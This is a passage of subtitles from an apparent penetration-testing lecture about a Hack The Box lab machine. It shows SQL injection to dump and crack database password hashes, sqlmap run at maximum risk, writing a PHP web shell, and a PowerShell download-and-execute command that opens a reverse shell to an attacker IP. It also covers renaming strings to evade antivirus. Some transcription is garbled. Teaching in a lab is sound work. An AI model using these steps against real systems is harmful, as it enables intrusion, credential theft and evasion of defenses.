788
00:56:54,970 --> 00:56:59,800
We should be able to use the injection to get these two columns, these two fields out of this table,

789
00:56:59,950 --> 00:57:00,940
user and password.

790
00:57:02,140 --> 00:57:03,070
So let's say.

791
00:57:04,660 --> 00:57:05,650
I see what we can do here.

792
00:57:09,090 --> 00:57:18,540
So instead of selecting the schema_name, we want to do user name and password, so user, password

793
00:57:18,960 --> 00:57:19,500
from.

794
00:57:22,510 --> 00:57:24,010
mysql.user.

795
00:57:25,650 --> 00:57:27,630
Right, the table, mysql.user.

796
00:57:32,210 --> 00:57:35,510
Control space, syntax error.

797
00:57:36,910 --> 00:57:37,840
And see what we did wrong.

798
00:57:40,050 --> 00:57:41,550
Probably the comma here.

799
00:57:46,060 --> 00:57:46,580
That was it.

800
00:57:47,560 --> 00:57:54,460
So now we can see the hashes of all these accounts, so I bet if we search this hash.

801
00:57:55,680 --> 00:58:03,300
We'll see that it matches the hash we've already captured for the manager, which is in creds, right.

802
00:58:05,070 --> 00:58:09,180
Yes, so first what we can do is we can do sudo

803
00:58:10,860 --> 00:58:19,950
hashid, just to make sure that this is a SHA-1 hash, and it is. So if we go to hashkiller.

804
00:58:22,060 --> 00:58:26,380
hashkiller.io, we can pop it in and see if it's been cracked before.

805
00:58:29,070 --> 00:58:32,190
So hash cracker, SHA-1.

806
00:58:33,510 --> 00:58:35,160
Control V, paste, submit.

807
00:58:36,510 --> 00:58:39,930
Yes, let me in, you see it right, let's go to search again.

808
00:58:40,730 --> 00:58:44,570
Let's go back to Burp, and if we grab this one.

809
00:58:46,070 --> 00:58:47,450
We can see if this has been cracked.

810
00:58:50,530 --> 00:58:52,180
Control V, paste, submit.

811
00:58:53,390 --> 00:58:55,220
And it has. Now we've got more creds.

812
00:59:10,440 --> 00:59:16,530
Tidy this up a bit, and the user name is Hector, and we got this.

813
00:59:19,630 --> 00:59:27,160
Discovered via SQLi from mysql.user table.

814
00:59:30,170 --> 00:59:33,290
Now, one thing you could do is run sqlmap on this too, so you can see.

815
00:59:36,990 --> 00:59:41,670
You know what this would do, so if we do, because I want you to see the manual method, now we can

816
00:59:41,670 --> 00:59:48,000
also see the automated method, control A, shift to a hotel control.

817
00:59:55,640 --> 00:59:59,570
We can actually save everything in a file, so if we go back to here.

818
01:00:01,390 --> 01:00:03,430
We can grab this right quick.

819
01:00:04,250 --> 01:00:04,660
Copy.

820
01:00:05,840 --> 01:00:10,040
Now, by the way, we could say right-click, copy to file, but if I do it this way.

821
01:00:11,960 --> 01:00:14,900
It's probably not going to work because Burp is not running.

822
01:00:15,200 --> 01:00:15,830
Oh, it did work.

823
01:00:15,980 --> 01:00:16,640
I'm surprised.

824
01:00:17,950 --> 01:00:21,520
Let's go here and let's see if we have it now, cat req.sql.

825
01:00:29,120 --> 01:00:30,230
Where did it save that file?

826
01:00:32,310 --> 01:00:32,820
Very quick.

827
01:00:36,390 --> 01:00:40,950
Copy to file, req.sql.

828
01:00:43,720 --> 01:00:44,380
I save.

829
01:00:48,660 --> 01:00:50,780
It's not here, so that's OK.

830
01:00:52,320 --> 01:00:54,210
vim req.sql.

831
01:00:56,460 --> 01:00:58,740
We'll make it easy, I.

832
01:01:00,530 --> 01:01:09,200
Control, should be... what we will do here is we will clean up this input here, because for an injection via

833
01:01:09,220 --> 01:01:14,400
sqlmap, they don't want the request to have the attack string present.

834
01:01:14,420 --> 01:01:15,470
So I just removed everything.

835
01:01:16,350 --> 01:01:23,440
Up to this, and I'm going to say escape, shift colon, w req.sql.

836
01:01:24,460 --> 01:01:24,920
Looks good.

837
01:01:28,470 --> 01:01:30,240
Now, when I run sqlmap.

838
01:01:31,480 --> 01:01:32,070
Should be better.

839
01:01:36,330 --> 01:01:41,530
If we go up here, control page up, we can see a couple of things here, right?

840
01:01:43,060 --> 01:01:45,160
So we obviously want to.

841
01:01:51,360 --> 01:01:54,660
Do --batch: never ask for user input, use default behavior.

842
01:01:56,710 --> 01:01:59,080
I'm actually not seeing everything here, so we could.

843
01:02:01,210 --> 01:02:01,810
I think if we.

844
01:02:03,530 --> 01:02:07,010
Do a tech help like this, it gives us more verbose help.

845
01:02:11,970 --> 01:02:13,410
Oh, sure, advanced help.

846
01:02:16,030 --> 01:02:16,750
-hh.

847
01:02:27,450 --> 01:02:33,450
Yeah, this is super advanced here, so we want to do a request, file a request from a file.

848
01:02:36,360 --> 01:02:39,120
We want to do --batch, and.

849
01:02:40,500 --> 01:02:45,960
We could specify user agent strings. I'm actually not going to use random agent, because I want you

850
01:02:45,960 --> 01:02:48,880
guys to see in the logs that come later, when we've compromised it.

851
01:02:48,940 --> 01:02:51,180
So I don't want you to see what it looks like.

852
01:02:53,940 --> 01:02:55,070
And what else do we want to do?

853
01:03:00,960 --> 01:03:05,220
So we can set the level, the default is one we want to set this to five.

854
01:03:06,200 --> 01:03:10,910
And we want to set the risk to three. Of course, if this were a real engagement, we wouldn't put the highest

855
01:03:10,910 --> 01:03:17,000
risk and level, because you might end up frying the box, but because it's Hack The Box and it's a virtual

856
01:03:17,000 --> 01:03:18,410
machine in a safe environment.

857
01:03:18,410 --> 01:03:19,520
It's OK to do that here.

858
01:03:25,080 --> 01:03:26,520
And then why do we want to deal with on a.

859
01:03:30,810 --> 01:03:34,890
Take a look at what we can do, let's just dump everything.

860
01:03:42,230 --> 01:03:43,190
All right, so that's running.

861
01:03:50,150 --> 01:03:51,580
That is absolutely amazing.

862
01:03:53,630 --> 01:03:55,700
You see, it's grabbing everything from this database.

863
01:03:55,910 --> 01:04:00,470
It's basically automating what we did manually.

864
01:04:02,570 --> 01:04:07,160
It already cracked one of the passwords, which we already knew; it was cool to see that it grabbed it.

865
01:04:09,330 --> 01:04:13,860
See, it's storing everything in the CSV file here, so we're going to take a look at that once it finishes.

866
01:04:15,530 --> 01:04:20,150
All right, so let's grab this let's actually just go to this folder.

867
01:04:26,810 --> 01:04:29,870
Of course we can't, so we need to first turn into root.

868
01:04:41,410 --> 01:04:42,400
I've gone to mysql.

869
01:04:43,690 --> 01:04:46,270
See a bunch of things, including user.csv.

870
01:04:47,680 --> 01:04:49,870
So we could open this if we do.

871
01:04:52,570 --> 01:04:53,500
LibreOffice.

872
01:05:06,050 --> 01:05:08,440
And yeah, everything looks good here, let's just go and open it.

873
01:05:12,590 --> 01:05:17,500
OK, and you can see pretty much what we saw through the manual methods, right?

874
01:05:17,590 --> 01:05:18,770
We've got the passwords.

875
01:05:20,870 --> 01:05:22,240
We've got the usernames.

876
01:05:23,940 --> 01:05:29,460
These are the hashes, but, you know, we cracked these hashes and we found out what we needed and you

877
01:05:29,460 --> 01:05:30,630
can see this one is cracked here.

878
01:05:31,530 --> 01:05:33,590
Looks like sqlmap wasn't able to crack Hector.

879
01:05:34,490 --> 01:05:39,380
But we did crack it by going to hashkiller and finding it that way, so, you know, there's always

880
01:05:39,380 --> 01:05:43,610
some value in using automated tools, but now at least you know how it works.

881
01:05:44,540 --> 01:05:46,850
You can actually see, if we scroll up in this output.

882
01:05:46,850 --> 01:05:49,190
You can see a couple of the tables that are discovered.

883
01:05:49,580 --> 01:05:49,940
Right.

884
01:05:53,760 --> 01:05:54,630
Some of the tables.

885
01:06:00,280 --> 01:06:02,170
So that is kind of interesting.

886
01:06:08,140 --> 01:06:10,520
Yeah, so there we go.

887
01:06:10,990 --> 01:06:12,010
Now, what can we do?

888
01:06:12,700 --> 01:06:15,250
Well, let's see if we can write a file.

889
01:06:15,280 --> 01:06:16,420
Let's see if we can write a shell.

890
01:06:16,930 --> 01:06:18,140
So let's duplicate this.

891
01:06:18,970 --> 01:06:20,590
I wish there was a way to keep tabs.

892
01:06:23,330 --> 01:06:24,650
So might have to copy this here.

893
01:06:27,360 --> 01:06:29,880
And we'll name this tab shell upload.

894
01:06:31,640 --> 01:06:36,320
So Target could put the IPN, put any.

895
01:06:41,140 --> 01:06:43,710
A nice web shell.

896
01:06:50,520 --> 01:06:52,350
OK, what else do we need?

897
01:06:52,410 --> 01:07:03,390
Let's grab this control, see jewelry and then control space just to make sure we're still getting what

898
01:07:03,390 --> 01:07:03,720
we want.

899
01:07:03,720 --> 01:07:08,780
They're all right and I'm going to put my search so we get to where we want to go.

900
01:07:10,680 --> 01:07:11,730
Chorus girl, sweet.

901
01:07:13,200 --> 01:07:14,040
So how can we write a shell?

902
01:07:14,070 --> 01:07:16,470
Well, there's a couple of ways we can load it.

903
01:07:16,920 --> 01:07:24,880
We can dump into... that is a MySQL command, INTO DUMPFILE.

904
01:07:26,340 --> 01:07:26,940
Here it is.

905
01:07:30,860 --> 01:07:39,320
Yeah, so if you do SELECT INTO OUTFILE, this is a common way of writing into MariaDB or MySQL,

906
01:07:40,220 --> 01:07:49,040
and this one will, because it's so common, it's easier to detect; this one here is less common.

907
01:07:49,370 --> 01:07:54,790
And so we can actually use this syntax to try to write some arbitrary commands to the Web server.

908
01:07:55,600 --> 01:07:56,150
Copy that.

909
01:07:56,360 --> 01:07:59,060
Let's go back to Burp and see how we can craft this query.

910
01:08:01,400 --> 01:08:05,300
This is how I like to do it, I like to paste it into the bottom where it's going to simplify this query

911
01:08:06,770 --> 01:08:10,970
by getting rid of everything inside here, I'm just putting a one.

912
01:08:13,140 --> 01:08:14,330
Let's just make sure it still works.

913
01:08:20,280 --> 01:08:22,830
Right, it's not working because of this, let's get rid of this right here.

914
01:08:28,980 --> 01:08:29,310
Right.

915
01:08:29,940 --> 01:08:30,500
It works, right?

916
01:08:30,550 --> 01:08:31,980
You see that one there they put through.

917
01:08:34,420 --> 01:08:37,040
Control space, so that's our insertion point.

918
01:08:37,780 --> 01:08:38,800
So what do we want to put there?

919
01:08:39,580 --> 01:08:44,430
Well, it's a SELECT INTO DUMPFILE and a file path, right.

920
01:08:46,060 --> 01:08:47,740
And what do we want to write?

921
01:08:47,770 --> 01:08:51,580
So first, let's grab this right here, Control X..

922
01:08:52,030 --> 01:08:56,560
This comes at the end of the query, so we'll put it right between the 6th and the end of the query

923
01:08:56,560 --> 01:08:56,980
right here.

924
01:08:59,670 --> 01:09:06,360
And this output file path, it's probably going to be something on the C drive; if we go here, we can see

925
01:09:07,230 --> 01:09:08,280
this is the path, right?

926
01:09:08,490 --> 01:09:09,360
So just copy that.

927
01:09:11,620 --> 01:09:14,350
Let's go back here and put this in.

928
01:09:16,640 --> 01:09:20,390
What do we name it? phpinfo.php,

929
01:09:23,450 --> 01:09:28,550
let's name it something kind of discreet, update.php, right.

930
01:09:29,030 --> 01:09:34,910
And then we have a select into this. Well, what are we dumping into this file, what do we put here?

931
01:09:35,450 --> 01:09:35,780
Right.

932
01:09:36,470 --> 01:09:45,320
So let's go ahead and put some PHP code, put in phpinfo, see if that works.

933
01:09:48,800 --> 01:09:49,760
Control space.

934
01:09:52,380 --> 01:09:54,180
And it says, I got a general error.

935
01:09:57,760 --> 01:09:58,930
If I try to send it again.

936
01:10:00,900 --> 01:10:01,770
Now it says.

937
01:10:03,400 --> 01:10:10,210
That the file already exists, so it's probably there, control of one.

938
01:10:13,640 --> 01:10:14,840
And info.

939
01:10:17,580 --> 01:10:18,270
What do we name it?

940
01:10:19,110 --> 01:10:19,830
We need to update.

941
01:10:24,870 --> 01:10:31,680
Yes, so this is really good and we can actually see that this is it saying it's Windows Server 2016.

942
01:10:32,320 --> 01:10:33,890
So we've got more information here.

943
01:10:33,900 --> 01:10:39,660
And since we are able to write arbitrary files to the web server and then we can access those files,

944
01:10:40,200 --> 01:10:41,270
we can upload a web shell.

945
01:10:42,240 --> 01:10:45,820
So let's convert this harmless, potentially harmless query into a web shell.

946
01:10:45,890 --> 01:10:48,360
Now, I'm going to send this to system.

947
01:10:50,880 --> 01:10:58,070
I'm going to name it like so, and since these are single ticks, these single ticks would make it

948
01:10:58,070 --> 01:10:58,760
a conflict.

949
01:10:58,760 --> 01:11:00,680
So let's change these to double quotes.

950
01:11:01,680 --> 01:11:02,730
On the outside.

951
01:11:04,390 --> 01:11:07,390
And probably change this file name, so let's say update.

952
01:11:10,570 --> 01:11:11,920
And control space.

953
01:11:14,630 --> 01:11:16,010
Change this to update.

954
01:11:17,900 --> 01:11:21,770
That's good. So what we're doing is we're passing this parameter.

955
01:11:23,410 --> 01:11:25,520
And we're going to say whoami; I'm going to put in a command.

956
01:11:25,540 --> 01:11:26,370
And it works.

957
01:11:26,980 --> 01:11:31,300
So the way this works is we're actually using this request function.

958
01:11:32,670 --> 01:11:35,670
So if we go to php.net.

959
01:11:37,130 --> 01:11:38,630
You can see what this does.

960
01:11:42,180 --> 01:11:50,340
It's request variables; it's an array that stores GET, POST and cookie requests, so here you put

961
01:11:50,340 --> 01:11:55,320
it in a GET request with this variable c, which was defined here.

962
01:11:56,820 --> 01:12:01,140
So the value of c is whoami.

963
01:12:02,220 --> 01:12:03,840
And that's a Windows command.

964
01:12:04,650 --> 01:12:07,710
And that's being passed to system.

965
01:12:07,980 --> 01:12:09,030
So it's going to be executed.

966
01:12:10,820 --> 01:12:17,870
On the system, on the local system, and the results are reflected in the HTTP response, and that's

967
01:12:17,870 --> 01:12:19,560
why we see this right here.

968
01:12:19,580 --> 01:12:25,970
For example, I can do ipconfig to get the IP configuration of the system.

969
01:12:26,970 --> 01:12:27,830
I can see the IP.

970
01:12:28,430 --> 01:12:29,240
Where is it?

971
01:12:29,660 --> 01:12:30,380
Here it is right here.

972
01:12:31,370 --> 01:12:35,450
If we do control you, you'll see it's nicely formatted, right.

973
01:12:36,050 --> 01:12:38,720
So now let's turn this into a proper shell.

974
01:12:39,980 --> 01:12:44,300
And first, I want to make sure that PowerShell is actually on here, because it'll make my life easier.

975
01:12:45,800 --> 01:12:47,920
And it is, because the PowerShell command worked.

976
01:12:47,930 --> 01:12:50,690
If I type powershell with three l's, an error message?

977
01:12:50,690 --> 01:12:50,930
Right.

978
01:12:51,380 --> 01:12:52,280
We just get nothing.

979
01:12:52,760 --> 01:12:56,760
But when I remove one of the l's, you can see we get what we want, so we know PowerShell.

980
01:12:56,760 --> 01:12:59,050
We can pass arbitrary commands to PowerShell

981
01:12:59,060 --> 01:13:01,690
on the victim; just turn on Burp.

982
01:13:03,350 --> 01:13:04,490
And let's grab this.

983
01:13:07,110 --> 01:13:09,720
In the history.

984
01:13:12,410 --> 01:13:13,940
Control R or control shift R.

985
01:13:15,800 --> 01:13:18,670
And we'll need this Web site.

986
01:13:18,830 --> 01:13:19,670
My name is noshing.

987
01:13:22,090 --> 01:13:25,870
That's the name of our shell we're going to use, and I want to change it from a GET request

988
01:13:25,870 --> 01:13:31,600
method to a POST so that I don't run into any character encoding issues.

989
01:13:31,600 --> 01:13:34,640
And it's a lot easier to read this way. Control space.

990
01:13:35,200 --> 01:13:35,740
There we go.

991
01:13:36,700 --> 01:13:37,600
What are we going to do here?

992
01:13:38,320 --> 01:13:39,130
Let's start with Nishang.

993
01:13:39,940 --> 01:13:41,220
So locate nishang.

994
01:13:42,700 --> 01:13:45,970
If you don't have nishang, you can just do apt install nishang.

995
01:13:48,090 --> 01:13:55,770
So, and you can see what we actually want is this Invoke-PowerShellTcp; we're going to grab this,

996
01:13:56,190 --> 01:14:04,590
sudo cp, control V, copy that to the current folder, then.

997
01:14:06,970 --> 01:14:10,750
And that's the only one said no.

998
01:14:12,250 --> 01:14:19,570
And what we need to do is go down here and we're going to use this template on this line so we can update

999
01:14:19,570 --> 01:14:22,100
the IP address and port to connect back to.

1000
01:14:22,420 --> 01:14:27,220
So this is going to be the IP address and port that the victim machine is going to connect back to on

1001
01:14:27,220 --> 01:14:27,970
our target machine.

1002
01:14:28,000 --> 01:14:31,720
So this is our local attack box, our IP and the local attack port.

1003
01:14:32,030 --> 01:14:32,350
OK.

1004
01:14:33,870 --> 01:14:35,040
So I'm going to press.

1005
01:14:36,560 --> 01:14:42,830
yy to yank, capital G to go to the bottom, i for insert mode, enter and then escape.

1006
01:14:44,880 --> 01:14:53,360
Capably and I delivered the word I was going to put in our IP address, let's see, do we really do

1007
01:14:53,360 --> 01:15:00,700
we delete what are we control, 80 percent percent IPA 10 zero.

1008
01:15:00,840 --> 01:15:02,370
We are 10.10.14.10.

1009
01:15:05,780 --> 01:15:11,540
10.10.14.10, and the port is 443, because that's usually allowed on firewalls. Escape,

1010
01:15:12,050 --> 01:15:12,340
easy.

1011
01:15:14,280 --> 01:15:23,130
OK, now what we can do is we can set up the web server on our local box on port 80, and then we can

1012
01:15:23,790 --> 01:15:31,230
set up a local netcat listener on port 443 to catch our shell.

1013
01:15:35,050 --> 01:15:37,870
So let me explain what's going to happen in a second.

1014
01:15:38,380 --> 01:15:46,810
Let me first create the command, so we're going to say powershell Invoke-Expression, Invoke-WebRequest

1015
01:15:47,260 --> 01:15:52,420
http://10.10.14.10/Invoke-PowerShell

1016
01:15:55,120 --> 01:15:59,080
Tcp.ps1, -UseBasicParsing.

1017
01:16:01,820 --> 01:16:02,540
I believe that's it.

1018
01:16:04,160 --> 01:16:05,580
Let's explain what's happening here.

1019
01:16:06,110 --> 01:16:06,590
So.

1020
01:16:08,400 --> 01:16:13,180
This is our attacking machine; we're hosting this shell script, which we just modified, right?

1021
01:16:13,890 --> 01:16:23,660
This is telling the victim machine to make a GET request to the attack machine and download this PowerShell

1022
01:16:23,670 --> 01:16:24,120
script.

1023
01:16:25,200 --> 01:16:26,260
And execute it.

1024
01:16:26,290 --> 01:16:30,610
That's what the Invoke-Expression means: it executes it in memory when it tries to execute a script.

1025
01:16:30,630 --> 01:16:37,850
The script contains code to establish a reverse shell from the victim to the attacker's port 443.

1026
01:16:38,310 --> 01:16:40,740
So we should get a shell in this box here.

1027
01:16:42,900 --> 01:16:43,800
I'm going to hit send.

1028
01:16:46,090 --> 01:16:49,790
And we see the download right here, but no shell.

1029
01:16:50,870 --> 01:16:56,300
So we probably have like AV or something on that victim that's messing with us.

1030
01:16:57,800 --> 01:16:59,860
Windows Defender has been getting a lot better these days.

1031
01:17:00,110 --> 01:17:04,810
So I have to do some things. It's probably got the name Invoke-PowerShellTcp.

1032
01:17:04,820 --> 01:17:10,160
Perhaps the local AV is just doing basic static string analysis.

1033
01:17:10,830 --> 01:17:17,840
So escape, and we can just obfuscate the string and get past the AV. See if we can do sudo sed.

1034
01:17:20,780 --> 01:17:30,440
I am going to substitute everywhere we see Invoke-PowerShellTcp; I'm going to replace it with foo. g means global,

1035
01:17:30,590 --> 01:17:32,190
capital I means case insensitive.

1036
01:17:32,210 --> 01:17:33,800
That's so it will also match invoke-powershelltcp

1037
01:17:33,800 --> 01:17:40,790
in lower case in the file. The file I want to do this substitution on is

1038
01:17:40,790 --> 01:17:41,390
Invoke-PowerShellTcp.ps1.

1039
01:17:42,680 --> 01:17:44,540
The -i just means do it in place.

1040
01:17:45,920 --> 01:17:47,600
s means substitute the string

1041
01:17:48,700 --> 01:17:49,480
with this string.

1042
01:17:50,910 --> 01:17:59,250
Right here, and then write the new substituted file back into the original. Here, right now,

1043
01:17:59,250 --> 01:18:07,040
if I do, let's see, cat Invoke... and grep -i to look for foo,

1044
01:18:07,710 --> 01:18:08,310
you'll see.

1045
01:18:09,880 --> 01:18:11,160
These lines have been updated, right?

1046
01:18:11,210 --> 01:18:18,910
That's the last line in the file, so I think if we do that and it shows the line numbers

1047
01:18:19,570 --> 01:18:23,290
up to the last line, and so this has been updated too. Now let's try it.

1048
01:18:24,880 --> 01:18:31,680
We are still listening on port 80, and we're still waiting for the shell on 443. Control-

1049
01:18:31,900 --> 01:18:35,110
Space. It's taking a little bit longer this time.

1050
01:18:35,110 --> 01:18:39,340
And bam, we've got a shell. whoami.

1051
01:18:41,380 --> 01:18:48,650
All right, so we've got this shell and we can see who else is on the box. Looks like there's Administrator,

1052
01:18:48,650 --> 01:18:52,080
and there's a Guest, there's Hector.

1053
01:18:52,720 --> 01:19:01,630
And so in the next lecture, we're actually going to do a horizontal escalation from this particular

1054
01:19:01,630 --> 01:19:04,900
user, which appears to be a service user.

1055
01:19:04,900 --> 01:19:10,330
This is probably, this is actually the service account that's running the IIS web application.

1056
01:19:10,990 --> 01:19:13,150
And we'll investigate this again once we pop the box.

1057
01:19:13,180 --> 01:19:15,940
We'll take a look at the services and the way it's set up.

1058
01:19:16,210 --> 01:19:21,220
But next lecture, we're going to do horizontal escalation into Hector, and then the lecture after that

1059
01:19:21,220 --> 01:19:24,430
will move into a true system compromise,

1060
01:19:24,430 --> 01:19:28,830
when we get SYSTEM access to the endpoint.

1061
01:19:29,320 --> 01:19:29,570
Right.

1062
01:19:29,610 --> 01:19:30,550
I'll see you in the next lecture.
